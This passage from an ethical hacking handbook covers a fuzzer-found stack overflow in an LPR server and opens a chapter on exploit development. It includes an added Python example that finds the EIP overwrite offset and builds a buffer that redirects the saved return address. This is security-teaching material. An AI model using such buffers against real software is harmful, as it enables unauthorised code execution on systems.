The A's (0x41 bytes) overwrote EIP
somewhere in the input due to a classic stack buffer overflow. At this point, we have enough information to
produce a vulnerability notice to the vendor... oh wait, it has already been done!
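Seeing EIP = 0x41414141 proves the return address was overwritten, but an all-A buffer cannot tell you at which offset. The standard next step is to replace the A's with a cyclic pattern in which every 4-byte window is unique, crash the target again, and map the value in EIP back to its position in the buffer. The following is an added example, an independent re-implementation of the pattern_create / pattern_offset technique popularised by Metasploit, not code from the book, from Sulley or from the NIPRINT3 exploit. It assumes a 32-bit little-endian x86 target (hence EIP); the offset 268 used in the check below is a made-up value for illustration, not the real NIPRINT3 offset.

```python
import string
import struct
from typing import Optional

# Character classes of the classic cyclic pattern: Aa0Aa1Aa2 ... Ab0Ab1 ... Zz9
_UPPER = string.ascii_uppercase
_LOWER = string.ascii_lowercase
_DIGIT = string.digits
MAX_UNIQUE = len(_UPPER) * len(_LOWER) * len(_DIGIT) * 3  # 20280 bytes


def cyclic_pattern(length: int) -> bytes:
    """Return `length` bytes of the pattern. Within the first MAX_UNIQUE bytes
    every 4-byte window occurs exactly once, so whatever lands in EIP
    identifies its own offset in the buffer."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern longer than the unique range (%d bytes)" % MAX_UNIQUE)
    out = bytearray()
    for u in _UPPER:
        for lo in _LOWER:
            for d in _DIGIT:
                out += (u + lo + d).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # only reached when length == MAX_UNIQUE


def pattern_offset(eip: int, length: int = MAX_UNIQUE) -> Optional[int]:
    """Map the 32-bit value the debugger shows in EIP back to the offset in
    the pattern that produced it. x86 is little-endian, so a register value
    of 0x41306141 corresponds to the bytes b'Aa0A' in send order."""
    needle = struct.pack("<I", eip & 0xFFFFFFFF)
    idx = cyclic_pattern(length).find(needle)
    return idx if idx != -1 else None


def build_crash_buffer(offset: int, ret_addr: int, payload: bytes, total: int) -> bytes:
    """Once the offset is known, lay out the buffer that repeats the crash
    deliberately: filler up to the saved return address, the address to
    jump to (little-endian), then the payload, padded to the original
    length so the server parses it the same way the fuzz case did."""
    buf = b"A" * offset + struct.pack("<I", ret_addr) + payload
    if len(buf) > total:
        raise ValueError("payload does not fit in the crashing request size")
    return buf + b"C" * (total - len(buf))


if __name__ == "__main__":
    # Constructed walk-through: pretend the debugger reported this EIP after
    # sending cyclic_pattern(1024) in place of the A's.
    observed_eip = struct.unpack("<I", cyclic_pattern(1024)[268:272])[0]
    print("EIP from all-A run maps to offset:", pattern_offset(0x41414141))  # None
    print("EIP 0x%08x maps to offset: %d" % (observed_eip, pattern_offset(observed_eip)))
```

Run it once to confirm that 0x41414141 yields no offset (the all-A crash is ambiguous by design) while a value taken from the cyclic pattern resolves to a single position; then feed that offset to build_crash_buffer to get a request that overwrites the return address with a chosen value rather than 0x41414141.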
Way Ahead
As you have seen, we have rediscovered the NIPRINT3 buffer overflow used in Chapter
11. However, there may be more bugs in that server or in any other LPR server. We will leave
it to you to use the tools and techniques discussed in this chapter to explore further.
Gray Hat Hacking: The Ethical Hacker's Handbook
Figure 17-2 Wireshark showing the packet that crashed the LPR server
References
www.grayhathackingbook.com
Dave Aitel, Block Based Fuzzing: www.immunitysec.com/downloads/advantages_of_block_based_analysis.pdf
Sulley Framework: www.fuzzing.org
Pedram Amini, Paimei: paimei.openrce.org
Sutton, Greene, Amini, Fuzzing: Brute Force Vulnerability Discovery (Addison-Wesley Professional, 2007)
Chapter 17: Intelligent Fuzzing with Sulley
PART IV
CHAPTER 18 From Vulnerability to Exploit
• Determining whether a bug is exploitable
• Using a debugger efficiently
• Understanding the exact nature of the problem
• Preconditions and postconditions for exploitation
• Repeating the problem reliably
• Payload construction considerations
• How to properly document the nature of a vulnerability
Whether you use static analysis, dynamic analysis, or some combination of both to discover
a problem with a piece of software, locating a potential problem or causing a program
to melt down in the face of a fuzzer onslaught is just the first step.